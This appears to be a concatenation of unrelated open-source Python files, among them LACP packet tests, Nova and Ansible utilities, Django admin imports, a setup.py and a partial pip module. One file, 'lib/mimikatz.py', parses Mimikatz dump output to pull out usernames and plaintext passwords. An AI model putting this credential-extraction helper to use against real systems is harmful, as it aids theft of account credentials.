self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
-1,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_timeout(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
-1,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_aggregation(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
-1,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_synchronization(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
-1,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_collecting(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
-1,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_distributing(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
-1,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_defaulted(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
-1,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_expired(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
-1,
self.collector_max_delay)
l.serialize()
def test_json(self):
jsondict = self.l.to_jsondict()
l = lacp.from_jsondict(jsondict['lacp'])
eq_(str(self.l), str(l))
|
apache-2.0
|
CEG-FYP-OpenStack/scheduler
|
nova/cmd/cells.py
|
9
|
1357
|
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Starter script for Nova Cells Service."""
import sys
from oslo_log import log as logging
from oslo_reports import guru_meditation_report as gmr
import nova.conf
from nova import config
from nova import objects
from nova import service
from nova import utils
from nova import version
CONF = nova.conf.CONF
def main():
config.parse_args(sys.argv)
logging.setup(CONF, 'nova')
utils.monkey_patch()
objects.register_all()
gmr.TextGuruMeditation.setup_autorun(version)
server = service.Service.create(binary='nova-cells',
topic=CONF.cells.topic,
manager=CONF.cells.manager)
service.serve(server)
service.wait()
|
apache-2.0
|
karkinosw/django-calaccess-raw-data
|
calaccess_raw/admin/__init__.py
|
29
|
4140
|
from calaccess_raw.admin.base import BaseAdmin
from calaccess_raw.admin.campaign import (
CvrSoCdAdmin,
Cvr2SoCdAdmin,
CvrCampaignDisclosureCdAdmin,
Cvr2CampaignDisclosureCdAdmin,
RcptCdAdmin,
Cvr3VerificationInfoCdAdmin,
LoanCdAdmin,
S401CdAdmin,
ExpnCdAdmin,
F495P2CdAdmin,
DebtCdAdmin,
S496CdAdmin,
SpltCdAdmin,
S497CdAdmin,
F501502CdAdmin,
S498CdAdmin,
)
from calaccess_raw.admin.lobbying import (
CvrRegistrationCdAdmin,
Cvr2RegistrationCdAdmin,
CvrLobbyDisclosureCdAdmin,
Cvr2LobbyDisclosureCdAdmin,
LobbyAmendmentsCdAdmin,
F690P2CdAdmin,
LattCdAdmin,
LexpCdAdmin,
LccmCdAdmin,
LothCdAdmin,
LempCdAdmin,
LpayCdAdmin,
)
from calaccess_raw.admin.common import (
FilernameCdAdmin,
FilerFilingsCdAdmin,
FilingsCdAdmin,
SmryCdAdmin,
CvrE530CdAdmin,
TextMemoCdAdmin,
)
from calaccess_raw.admin.other import (
AcronymsCdAdmin,
AddressCdAdmin,
BallotMeasuresCdAdmin,
EfsFilingLogCdAdmin,
FilersCdAdmin,
FilerAcronymsCdAdmin,
FilerAddressCdAdmin,
FilerEthicsClassCdAdmin,
FilerInterestsCdAdmin,
FilerLinksCdAdmin,
FilerStatusTypesCdAdmin,
FilerToFilerTypeCdAdmin,
FilerTypesCdAdmin,
FilerXrefCdAdmin,
FilingPeriodCdAdmin,
GroupTypesCdAdmin,
HeaderCdAdmin,
HdrCdAdmin,
ImageLinksCdAdmin,
LegislativeSessionsCdAdmin,
LobbyingChgLogCdAdmin,
LobbyistContributions1CdAdmin,
LobbyistContributions2CdAdmin,
LobbyistContributions3CdAdmin,
LobbyistEmployer1CdAdmin,
LobbyistEmployer2CdAdmin,
LobbyistEmployer3CdAdmin,
LobbyistEmployerFirms1CdAdmin,
LobbyistEmployerFirms2CdAdmin,
LobbyistEmpLobbyist1CdAdmin,
LobbyistEmpLobbyist2CdAdmin,
LobbyistFirm1CdAdmin,
LobbyistFirm2CdAdmin,
LobbyistFirm3CdAdmin,
LobbyistFirmEmployer1CdAdmin,
LobbyistFirmEmployer2CdAdmin,
LobbyistFirmLobbyist1CdAdmin,
LobbyistFirmLobbyist2CdAdmin,
LookupCodeAdmin,
NamesCdAdmin,
ReceivedFilingsCdAdmin,
ReportsCdAdmin,
)
__all__ = [
'BaseAdmin',
'CvrSoCdAdmin',
'Cvr2SoCdAdmin',
'CvrCampaignDisclosureCdAdmin',
'Cvr2CampaignDisclosureCdAdmin',
'RcptCdAdmin',
'Cvr3VerificationInfoCdAdmin',
'LoanCdAdmin',
'S401CdAdmin',
'ExpnCdAdmin',
'F495P2CdAdmin',
'DebtCdAdmin',
'S496CdAdmin',
'SpltCdAdmin',
'S497CdAdmin',
'F501502CdAdmin',
'S498CdAdmin',
'CvrRegistrationCdAdmin',
'Cvr2RegistrationCdAdmin',
'CvrLobbyDisclosureCdAdmin',
'Cvr2LobbyDisclosureCdAdmin',
'LobbyAmendmentsCdAdmin',
'F690P2CdAdmin',
'LattCdAdmin',
'LexpCdAdmin',
'LccmCdAdmin',
'LothCdAdmin',
'LempCdAdmin',
'LpayCdAdmin',
'FilerFilingsCdAdmin',
'FilingsCdAdmin',
'SmryCdAdmin',
'CvrE530CdAdmin',
'TextMemoCdAdmin',
'AcronymsCdAdmin',
'AddressCdAdmin',
'BallotMeasuresCdAdmin',
'EfsFilingLogCdAdmin',
'FilernameCdAdmin',
'FilersCdAdmin',
'FilerAcronymsCdAdmin',
'FilerAddressCdAdmin',
'FilerEthicsClassCdAdmin',
'FilerInterestsCdAdmin',
'FilerLinksCdAdmin',
'FilerStatusTypesCdAdmin',
'FilerToFilerTypeCdAdmin',
'FilerTypesCdAdmin',
'FilerXrefCdAdmin',
'FilingPeriodCdAdmin',
'GroupTypesCdAdmin',
'HeaderCdAdmin',
'HdrCdAdmin',
'ImageLinksCdAdmin',
'LegislativeSessionsCdAdmin',
'LobbyingChgLogCdAdmin',
'LobbyistContributions1CdAdmin',
'LobbyistContributions2CdAdmin',
'LobbyistContributions3CdAdmin',
'LobbyistEmployer1CdAdmin',
'LobbyistEmployer2CdAdmin',
'LobbyistEmployer3CdAdmin',
'LobbyistEmployerFirms1CdAdmin',
'LobbyistEmployerFirms2CdAdmin',
'LobbyistEmpLobbyist1CdAdmin',
'LobbyistEmpLobbyist2CdAdmin',
'LobbyistFirm1CdAdmin',
'LobbyistFirm2CdAdmin',
'LobbyistFirm3CdAdmin',
'LobbyistFirmEmployer1CdAdmin',
'LobbyistFirmEmployer2CdAdmin',
'LobbyistFirmLobbyist1CdAdmin',
'LobbyistFirmLobbyist2CdAdmin',
'LookupCodeAdmin',
'NamesCdAdmin',
'ReceivedFilingsCdAdmin',
'ReportsCdAdmin',
]
|
mit
|
archf/ansible
|
lib/ansible/module_utils/netcli.py
|
87
|
9650
|
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Copyright (c) 2015 Peter Sprygada, <[email protected]>
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import shlex
import time
from ansible.module_utils.parsing.convert_bool import BOOLEANS_TRUE, BOOLEANS_FALSE
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils.six.moves import zip
def to_list(val):
if isinstance(val, (list, tuple)):
return list(val)
elif val is not None:
return [val]
else:
return list()
class FailedConditionsError(Exception):
def __init__(self, msg, failed_conditions):
super(FailedConditionsError, self).__init__(msg)
self.failed_conditions = failed_conditions
class FailedConditionalError(Exception):
def __init__(self, msg, failed_conditional):
super(FailedConditionalError, self).__init__(msg)
self.failed_conditional = failed_conditional
class AddCommandError(Exception):
def __init__(self, msg, command):
super(AddCommandError, self).__init__(msg)
self.command = command
class AddConditionError(Exception):
def __init__(self, msg, condition):
super(AddConditionError, self).__init__(msg)
self.condition = condition
class Cli(object):
def __init__(self, connection):
self.connection = connection
self.default_output = connection.default_output or 'text'
self._commands = list()
@property
def commands(self):
return [str(c) for c in self._commands]
def __call__(self, commands, output=None):
objects = list()
for cmd in to_list(commands):
objects.append(self.to_command(cmd, output))
return self.connection.run_commands(objects)
def to_command(self, command, output=None, prompt=None, response=None, **kwargs):
output = output or self.default_output
if isinstance(command, Command):
return command
if isinstance(prompt, string_types):
prompt = re.compile(re.escape(prompt))
return Command(command, output, prompt=prompt, response=response, **kwargs)
def add_commands(self, commands, output=None, **kwargs):
for cmd in commands:
self._commands.append(self.to_command(cmd, output, **kwargs))
def run_commands(self):
responses = self.connection.run_commands(self._commands)
for resp, cmd in zip(responses, self._commands):
cmd.response = resp
# wipe out the commands list to avoid issues if additional
# commands are executed later
self._commands = list()
return responses
class Command(object):
def __init__(self, command, output=None, prompt=None, response=None,
**kwargs):
self.command = command
self.output = output
self.command_string = command
self.prompt = prompt
self.response = response
self.args = kwargs
def __str__(self):
return self.command_string
class CommandRunner(object):
def __init__(self, module):
self.module = module
self.items = list()
self.conditionals = set()
self.commands = list()
self.retries = 10
self.interval = 1
self.match = 'all'
self._default_output = module.connection.default_output
def add_command(self, command, output=None, prompt=None, response=None,
**kwargs):
if command in [str(c) for c in self.commands]:
raise AddCommandError('duplicated command detected', command=command)
cmd = self.module.cli.to_command(command, output=output, prompt=prompt,
response=response, **kwargs)
self.commands.append(cmd)
def get_command(self, command, output=None):
for cmd in self.commands:
if cmd.command == command:
return cmd.response
raise ValueError("command '%s' not found" % command)
def get_responses(self):
return [cmd.response for cmd in self.commands]
def add_conditional(self, condition):
try:
self.conditionals.add(Conditional(condition))
except AttributeError as exc:
raise AddConditionError(msg=str(exc), condition=condition)
def run(self):
while self.retries > 0:
self.module.cli.add_commands(self.commands)
responses = self.module.cli.run_commands()
for item in list(self.conditionals):
if item(responses):
if self.match == 'any':
return item
self.conditionals.remove(item)
if not self.conditionals:
break
time.sleep(self.interval)
self.retries -= 1
else:
failed_conditions = [item.raw for item in self.conditionals]
errmsg = 'One or more conditional statements have not been satisfied'
raise FailedConditionsError(errmsg, failed_conditions)
class Conditional(object):
"""Used in command modules to evaluate waitfor conditions
"""
OPERATORS = {
'eq': ['eq', '=='],
'neq': ['neq', 'ne', '!='],
'gt': ['gt', '>'],
'ge': ['ge', '>='],
'lt': ['lt', '<'],
'le': ['le', '<='],
'contains': ['contains'],
'matches': ['matches']
}
def __init__(self, conditional, encoding=None):
self.raw = conditional
try:
key, op, val = shlex.split(conditional)
except ValueError:
raise ValueError('failed to parse conditional')
self.key = key
self.func = self._func(op)
self.value = self._cast_value(val)
def __call__(self, data):
value = self.get_value(dict(result=data))
return self.func(value)
def _cast_value(self, value):
if value in BOOLEANS_TRUE:
return True
elif value in BOOLEANS_FALSE:
return False
elif re.match(r'^\d+\.d+$', value):
return float(value)
elif re.match(r'^\d+$', value):
return int(value)
else:
return text_type(value)
def _func(self, oper):
for func, operators in self.OPERATORS.items():
if oper in operators:
return getattr(self, func)
raise AttributeError('unknown operator: %s' % oper)
def get_value(self, result):
try:
return self.get_json(result)
except (IndexError, TypeError, AttributeError):
msg = 'unable to apply conditional to result'
raise FailedConditionalError(msg, self.raw)
def get_json(self, result):
string = re.sub(r"\[[\'|\"]", ".", self.key)
string = re.sub(r"[\'|\"]\]", ".", string)
parts = re.split(r'\.(?=[^\]]*(?:\[|$))', string)
for part in parts:
match = re.findall(r'\[(\S+?)\]', part)
if match:
key = part[:part.find('[')]
result = result[key]
for m in match:
try:
m = int(m)
except ValueError:
m = str(m)
result = result[m]
else:
result = result.get(part)
return result
def number(self, value):
if '.' in str(value):
return float(value)
else:
return int(value)
def eq(self, value):
return value == self.value
def neq(self, value):
return value != self.value
def gt(self, value):
return self.number(value) > self.value
def ge(self, value):
return self.number(value) >= self.value
def lt(self, value):
return self.number(value) < self.value
def le(self, value):
return self.number(value) <= self.value
def contains(self, value):
return str(self.value) in value
def matches(self, value):
match = re.search(self.value, value, re.M)
return match is not None
|
gpl-3.0
|
mfcovington/djangocms-genome-browser
|
setup.py
|
1
|
2128
|
import os
import sys
from setuptools import setup
if sys.version_info < (3, 2):
print("Sorry, djangocms-genome-browser currently requires Python 3.2+.")
sys.exit(1)
# From: https://hynek.me/articles/sharing-your-labor-of-love-pypi-quick-and-dirty/
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
install_requires = [
'Django>=1.7',
'django-cms>=3.0.7,<3.2',
'django-filer>=0.9.10',
]
setup(
name='djangocms-genome-browser',
version='0.1.1',
packages=['cms_genome_browser'],
include_package_data=True,
license='BSD License',
description='A Django app for incorporating a Dalliance genome browser into a Django site with django CMS-specific features',
long_description=(read('README.rst') + '\n\n' +
read('CHANGELOG.rst')),
url='https://github.com/mfcovington/djangocms-genome-browser',
author='Michael F. Covington',
author_email='[email protected]',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.7',
'Framework :: Django :: 1.8',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Topic :: Scientific/Engineering :: Visualization',
],
install_requires=install_requires,
)
|
bsd-3-clause
|
Netscape007/kacak
|
lib/mimikatz.py
|
8
|
1560
|
__VERSION__ = '2.0'
__AUTHOR__ = 'Galkan'
__DATE__ = '2014'
try:
import sys
import re
from lib.common import *
except ImportError,e:
import sys
sys.stdout.write("%s\n" %e)
sys.exit(1)
class Mimikatz:
def __init__(self, mimikatz_file):
self.mimikatz_file = mimikatz_file
self.mimikatz_start = re.compile("kerberos")
self.mimikatz_info = re.compile("\*\s([^\s]+)\s*:\s([^$]+$)")
def run(self):
read_file = open(self.mimikatz_file, "r").read().splitlines()
result = {}
username = ""
password = ""
control = 0
for line in read_file:
if re.search(self.mimikatz_start, line):
control = 1
elif (control == 1) and (re.search(self.mimikatz_info, line)):
user_info = re.search(self.mimikatz_info, line).groups(0)
if user_info[0] == "Username":
username = user_info[1]
if username and not username == "(null)" and not username in result.keys():
result[username] = ""
elif user_info[0] == "Password":
password = user_info[1]
if password and username and not password == "(null)":
result[username] = password
username = ""
password = ""
elif (control == 1) and (not re.search(self.mimikatz_info, line)):
control = 0
for user in sorted(result, key=result.get, reverse=False):
print bcolors.OKBLUE + "Kadi: " + bcolors.ENDC + bcolors.OKGREEN + "%s"% (user) + bcolors.ENDC + bcolors.OKBLUE + " Parola: " + bcolors.ENDC + bcolors.OKGREEN + "%s"% (result[user]) + bcolors.ENDC
|
mit
|
royc1/gpdb
|
gpMgmt/bin/gppylib/commands/san.py
|
30
|
1954
|
#!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2008. All Rights Reserved.
#
# Greenplum SAN related utility commands
from gppylib.commands.base import *
from gppylib.util.san_utils import SAN_CMDS
#----------mount ---------------
class Mount(Command):
"""Retrieves mount points."""
def __init__(self, name, devfirst=True, ctxt=LOCAL, remoteHost=None):
cmdStr = SAN_CMDS.MOUNT
self.devfirst = devfirst
print cmdStr
Command.__init__(self, name, cmdStr, ctxt, remoteHost)
@staticmethod
def remote(name, hostname, devfirst=True):
cmd = Mount(name, devfirst, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
return cmd
def get_mount_points(self):
mps = []
out = self.get_results().stdout.strip()
for l in out.split('\n'):
x = l.strip().split()
if self.devfirst:
thismp = (x[0], x[2])
else:
thismp = (x[2], x[0])
mps.append(thismp)
return mps
#----------inq ---------------
class Inq(Command):
def __init__(self, name, ctxt=LOCAL, remoteHost=None):
cmdStr = '%s -clar_wwn -no_dots' % SAN_CMDS.INQ
Command.__init__(self, name, cmdStr, ctxt, remoteHost)
@staticmethod
def remote(name, hostname):
cmd = Inq(name, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
return cmd
#----------gp_mount_agent ---------------
class GpMountAgentStorageGroup(Command):
def __init__(self, name, ctxt=LOCAL, remoteHost=None):
cmdStr = '%s --storagegroup %s' % (SAN_CMDS.GP_MOUNT_AGENT, SAN_CMDS.POWERMT)
Command.__init__(self, name, cmdStr, ctxt, remoteHost)
@staticmethod
def remote(name, hostname):
cmd = GpMountAgentStorageGroup(name, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
return cmd
|
apache-2.0
|
wunderlins/learning
|
python/django/lib/python2.7/site-packages/pip/req/req_set.py
|
53
|
32312
|
from __future__ import absolute_import
from collections import defaultdict
from itertools import chain
import logging
import os
from pip._vendor import pkg_resources
from pip._vendor import requests
from pip.compat import expanduser
from pip.download import (is_file_url, is_dir_url, is_vcs_url, url_to_path,
unpack_url)
from pip.exceptions import (InstallationError, BestVersionAlreadyInstalled,
DistributionNotFound, PreviousBuildDirError,
HashError, HashErrors, HashUnpinned,
DirectoryUrlHashUnsupported, VcsHashUnsupported)
from pip.req.req_install import InstallRequirement
from pip.utils import (
display_path, dist_in_usersite, ensure_dir, normalize_path)
from pip.utils.hashes import MissingHashes
from pip.utils.logging import indent_log
from pip.vcs import vcs
logger = logging.getLogger(__name__)
class Requirements(object):
def __init__(self):
self._keys = []
self._dict = {}
def keys(self):
return self._keys
def values(self):
return [self._dict[key] for key in self._keys]
def __contains__(self, item):
return item in self._keys
def __setitem__(self, key, value):
if key not in self._keys:
self._keys.append(key)
self._dict[key] = value
def __getitem__(self, key):
return self._dict[key]
def __repr__(self):
values = ['%s: %s' % (repr(k), repr(self[k])) for k in self.keys()]
return 'Requirements({%s})' % ', '.join(values)
class DistAbstraction(object):
"""Abstracts out the wheel vs non-wheel prepare_files logic.
The requirements for anything installable are as follows:
- we must be able to determine the requirement name
(or we can't correctly handle the non-upgrade case).
- we must be able to generate a list of run-time dependencies
without installing any additional packages (or we would
have to either burn time by doing temporary isolated installs
or alternatively violate pips 'don't start installing unless
all requirements are available' rule - neither of which are
desirable).
- for packages with setup requirements, we must also be able
to determine their requirements without installing additional
packages (for the same reason as run-time dependencies)
- we must be able to create a Distribution object exposing the
above metadata.
"""
def __init__(self, req_to_install):
self.req_to_install = req_to_install
def dist(self, finder):
"""Return a setuptools Dist object."""
raise NotImplementedError(self.dist)
def prep_for_dist(self):
"""Ensure that we can get a Dist for this requirement."""
raise NotImplementedError(self.dist)
def make_abstract_dist(req_to_install):
"""Factory to make an abstract dist object.
Preconditions: Either an editable req with a source_dir, or satisfied_by or
a wheel link, or a non-editable req with a source_dir.
:return: A concrete DistAbstraction.
"""
if req_to_install.editable:
return IsSDist(req_to_install)
elif req_to_install.link and req_to_install.link.is_wheel:
return IsWheel(req_to_install)
else:
return IsSDist(req_to_install)
class IsWheel(DistAbstraction):
def dist(self, finder):
return list(pkg_resources.find_distributions(
self.req_to_install.source_dir))[0]
def prep_for_dist(self):
# FIXME:https://github.com/pypa/pip/issues/1112
pass
class IsSDist(DistAbstraction):
def dist(self, finder):
dist = self.req_to_install.get_dist()
# FIXME: shouldn't be globally added:
if dist.has_metadata('dependency_links.txt'):
finder.add_dependency_links(
dist.get_metadata_lines('dependency_links.txt')
)
return dist
def prep_for_dist(self):
self.req_to_install.run_egg_info()
self.req_to_install.assert_source_matches_version()
class Installed(DistAbstraction):
def dist(self, finder):
return self.req_to_install.satisfied_by
def prep_for_dist(self):
pass
class RequirementSet(object):
def __init__(self, build_dir, src_dir, download_dir, upgrade=False,
ignore_installed=False, as_egg=False, target_dir=None,
ignore_dependencies=False, force_reinstall=False,
use_user_site=False, session=None, pycompile=True,
isolated=False, wheel_download_dir=None,
wheel_cache=None, require_hashes=False):
"""Create a RequirementSet.
:param wheel_download_dir: Where still-packed .whl files should be
written to. If None they are written to the download_dir parameter.
Separate to download_dir to permit only keeping wheel archives for
pip wheel.
:param download_dir: Where still packed archives should be written to.
If None they are not saved, and are deleted immediately after
unpacking.
:param wheel_cache: The pip wheel cache, for passing to
InstallRequirement.
"""
if session is None:
raise TypeError(
"RequirementSet() missing 1 required keyword argument: "
"'session'"
)
self.build_dir = build_dir
self.src_dir = src_dir
# XXX: download_dir and wheel_download_dir overlap semantically and may
# be combined if we're willing to have non-wheel archives present in
# the wheelhouse output by 'pip wheel'.
self.download_dir = download_dir
self.upgrade = upgrade
self.ignore_installed = ignore_installed
self.force_reinstall = force_reinstall
self.requirements = Requirements()
# Mapping of alias: real_name
self.requirement_aliases = {}
self.unnamed_requirements = []
self.ignore_dependencies = ignore_dependencies
self.successfully_downloaded = []
self.successfully_installed = []
self.reqs_to_cleanup = []
self.as_egg = as_egg
self.use_user_site = use_user_site
self.target_dir = target_dir # set from --target option
self.session = session
self.pycompile = pycompile
self.isolated = isolated
if wheel_download_dir:
wheel_download_dir = normalize_path(wheel_download_dir)
self.wheel_download_dir = wheel_download_dir
self._wheel_cache = wheel_cache
self.require_hashes = require_hashes
# Maps from install_req -> dependencies_of_install_req
self._dependencies = defaultdict(list)
def __str__(self):
reqs = [req for req in self.requirements.values()
if not req.comes_from]
reqs.sort(key=lambda req: req.name.lower())
return ' '.join([str(req.req) for req in reqs])
def __repr__(self):
reqs = [req for req in self.requirements.values()]
reqs.sort(key=lambda req: req.name.lower())
reqs_str = ', '.join([str(req.req) for req in reqs])
return ('<%s object; %d requirement(s): %s>'
% (self.__class__.__name__, len(reqs), reqs_str))
def add_requirement(self, install_req, parent_req_name=None):
"""Add install_req as a requirement to install.
:param parent_req_name: The name of the requirement that needed this
added. The name is used because when multiple unnamed requirements
resolve to the same name, we could otherwise end up with dependency
links that point outside the Requirements set. parent_req must
already be added. Note that None implies that this is a user
supplied requirement, vs an inferred one.
:return: Additional requirements to scan. That is either [] if
the requirement is not applicable, or [install_req] if the
requirement is applicable and has just been added.
"""
name = install_req.name
if not install_req.match_markers():
logger.warning("Ignoring %s: markers %r don't match your "
"environment", install_req.name,
install_req.markers)
return []
install_req.as_egg = self.as_egg
install_req.use_user_site = self.use_user_site
install_req.target_dir = self.target_dir
install_req.pycompile = self.pycompile
if not name:
# url or path requirement w/o an egg fragment
self.unnamed_requirements.append(install_req)
return [install_req]
else:
try:
existing_req = self.get_requirement(name)
except KeyError:
existing_req = None
if (parent_req_name is None and existing_req and not
existing_req.constraint and
existing_req.extras == install_req.extras and not
existing_req.req.specs == install_req.req.specs):
raise InstallationError(
'Double requirement given: %s (already in %s, name=%r)'
% (install_req, existing_req, name))
if not existing_req:
# Add requirement
self.requirements[name] = install_req
# FIXME: what about other normalizations? E.g., _ vs. -?
if name.lower() != name:
self.requirement_aliases[name.lower()] = name
result = [install_req]
else:
# Assume there's no need to scan, and that we've already
# encountered this for scanning.
result = []
if not install_req.constraint and existing_req.constraint:
if (install_req.link and not (existing_req.link and
install_req.link.path == existing_req.link.path)):
self.reqs_to_cleanup.append(install_req)
raise InstallationError(
"Could not satisfy constraints for '%s': "
"installation from path or url cannot be "
"constrained to a version" % name)
# If we're now installing a constraint, mark the existing
# object for real installation.
existing_req.constraint = False
existing_req.extras = tuple(
sorted(set(existing_req.extras).union(
set(install_req.extras))))
logger.debug("Setting %s extras to: %s",
existing_req, existing_req.extras)
# And now we need to scan this.
result = [existing_req]
# Canonicalise to the already-added object for the backref
# check below.
install_req = existing_req
if parent_req_name:
parent_req = self.get_requirement(parent_req_name)
self._dependencies[parent_req].append(install_req)
return result
def has_requirement(self, project_name):
name = project_name.lower()
if (name in self.requirements and
not self.requirements[name].constraint or
name in self.requirement_aliases and
not self.requirements[self.requirement_aliases[name]].constraint):
return True
return False
@property
def has_requirements(self):
return list(req for req in self.requirements.values() if not
req.constraint) or self.unnamed_requirements
@property
def is_download(self):
